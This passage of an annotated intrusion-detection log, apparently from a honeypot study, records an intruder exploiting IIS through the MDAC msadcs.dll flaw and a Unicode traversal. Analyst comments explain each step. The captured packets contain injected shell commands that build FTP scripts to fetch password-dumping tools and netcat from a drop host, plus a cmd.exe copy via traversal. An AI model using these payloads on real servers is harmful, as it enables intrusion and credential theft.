.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC exploit to run the FTP client in scripted mode (ftp -s:ftpcom)
!@# Since the 'open' line was overwritten by the single '>' in 'echo johna2k > ftpcom', the script never connects anywhere and does nothing
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:22.618538 213.116.251.162:1832 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11523 IpLen:20 DgmLen:733 DF
***AP*** Seq: 0x993FB647 Ack: 0x2CB9ABFD Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 539..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 330..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o
.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=
.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b
.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After about a minute, the MDAC exploit is used to send an 'open 212.139.12.26' command. Note that this is not the address the attack is coming from (213.116.251.162).
!@# This cannot work: the command runs in a fresh cmd.exe, which has no 'open' command, so it never reaches the ftp session.
!@# The intruder likely got suspicious after no connection came back to the drop host for the better part of a minute
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:27.521384 213.116.251.162:1840 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11568 IpLen:20 DgmLen:780 DF
***AP*** Seq: 0x9A3C2272 Ack: 0x2CBAA953 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 549..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 340..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .o.p.e.n. .2.1.2...1.3.9...1.
2...2.6.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.
e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.
\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...
m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to start building yet another FTP script, this one called 'sasfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:29.736949 213.116.251.162:1842 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11579 IpLen:20 DgmLen:788 DF
***AP*** Seq: 0x9A465B87 Ack: 0x2CBAB248 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 557..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 348..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>.
>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t.
.A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.
i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.
t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:31.855334 213.116.251.162:1844 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11590 IpLen:20 DgmLen:790 DF
***AP*** Seq: 0x9A4FFAF9 Ack: 0x2CBABA9D Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 559..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 350..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.x.e.d.j.0.0. .
>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.
t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.
w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.
s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The purpose of this file is to try to download the toolkit again
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:33.939196 213.116.251.162:1846 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11602 IpLen:20 DgmLen:800 DF
***AP*** Seq: 0x9A591BD3 Ack: 0x2CBAC284 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 569..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 360..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p.
..e.x.e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.
r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.
q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.
\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:36.006964 213.116.251.162:1848 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11613 IpLen:20 DgmLen:804 DF
***AP*** Seq: 0x9A62897E Ack: 0x2CBACAC5 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 573..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 364..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.
m.p...d.l.l. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.
i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.
d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.
a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:38.482725 213.116.251.162:1850 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11624 IpLen:20 DgmLen:794 DF
***AP*** Seq: 0x9A6D82FF Ack: 0x2CBAD497 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 563..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 354..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.
e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.
o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.
:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.
c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:40.525442 213.116.251.162:1852 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11634 IpLen:20 DgmLen:782 DF
***AP*** Seq: 0x9A76DCCC Ack: 0x2CBADC4B Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 551..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 342..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>.s.a.
s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.
c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.
t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r.
..m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The MDAC vulnerability is used to run the FTP client in scripted mode with the 'sasfile' script
!@# Again, the script file has no 'open' command, so ftp.exe never connects
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:42.452596 213.116.251.162:1854 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11645 IpLen:20 DgmLen:772 DF
***AP*** Seq: 0x9A7FBB13 Ack: 0x2CBAE41E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 541..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 332..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.s.a.s.f.i.l.e.
".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .
D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.
p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;.
..--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After about a minute and a half, he/she uses the MDAC vulnerability to send 'open 213.116.251.162' (this time the attacking host itself)
!@# Again, this will not do anything, as cmd.exe does not recognize 'open' as a valid command
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:11.229519 213.116.251.162:1857 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11673 IpLen:20 DgmLen:784 DF
***AP*** Seq: 0x9BD42341 Ack: 0x2CBC3E8E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 553..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 344..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .o.p.e.n. .2.1.3...1.1.6...2.
5.1...1.6.2.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.
c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.
n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.
r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC to append the username 'johna2k' to 'sasfile' (with '>>', so this is added to the existing file rather than replacing it)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:13.430802 213.116.251.162:1859 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11684 IpLen:20 DgmLen:788 DF
***AP*** Seq: 0x9BDDEF1B Ack: 0x2CBC4779 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 557..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 348..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>.
>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t.
.A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.
i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.
t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to append the password 'haxedj00' to 'sasfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:15.340768 213.116.251.162:1861 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11694 IpLen:20 DgmLen:790 DF
***AP*** Seq: 0x9BE6D101 Ack: 0x2CBC4EE8 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 559..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 350..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.x.e.d.j.0.0. .
>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.
t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.
w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.
s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to append the commands that fetch the tools (pdump.exe, samdump.dll, nc.exe) and 'quit' to 'sasfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:17.354573 213.116.251.162:1863 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11704 IpLen:20 DgmLen:800 DF
***AP*** Seq: 0x9BEFE2A0 Ack: 0x2CBC5689 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 569..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 360..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p.
..e.x.e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.
r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.
q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.
\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:19.358555 213.116.251.162:1865 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11714 IpLen:20 DgmLen:804 DF
***AP*** Seq: 0x9BF94C83 Ack: 0x2CBC5EA2 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 573..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 364..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.
m.p...d.l.l. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.
i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.
d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.
a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:21.541600 213.116.251.162:1867 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11725 IpLen:20 DgmLen:794 DF
***AP*** Seq: 0x9C02E2E3 Ack: 0x2CBC671F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 563..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 354..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.
e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.
o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.
:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.
c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:23.571942 213.116.251.162:1869 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11736 IpLen:20 DgmLen:782 DF
***AP*** Seq: 0x9C0C21D3 Ack: 0x2CBC6F06 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 551..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 342..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>.s.a.
s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.
c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.
t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r.
..m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to run the ftp client with the 'sasfile' script
!@# But nothing happens, since the script still never opens an FTP connection. (It may also leave these files locked.)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:25.525415 213.116.251.162:1871 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11747 IpLen:20 DgmLen:772 DF
***AP*** Seq: 0x9C14D6EA Ack: 0x2CBC76C4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 541..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 332..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.s.a.s.f.i.l.e.
".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .
D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.
p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;.
..--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the Unicode vulnerability to make a copy of cmd.exe named cmd1.exe in the msadc directory. This is the usual workaround for IIS refusing to pass redirection characters ('>', '>>') to a binary called cmd.exe; a renamed copy is not checked.
!@# The 502 'CGI Error' in the response is just IIS complaining that cmd.exe's output carried no HTTP headers; the '1 file(s) copied' in the body shows the copy succeeded.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:03.136533 213.116.251.162:1874 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11783 IpLen:20 DgmLen:356 DF
***AP*** Seq: 0x9CA64B94 Ack: 0x2CBD0981 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../winnt/system32/cmd.e
xe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1..Accept:
*/*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..Use
r-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hot
bar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Alive....
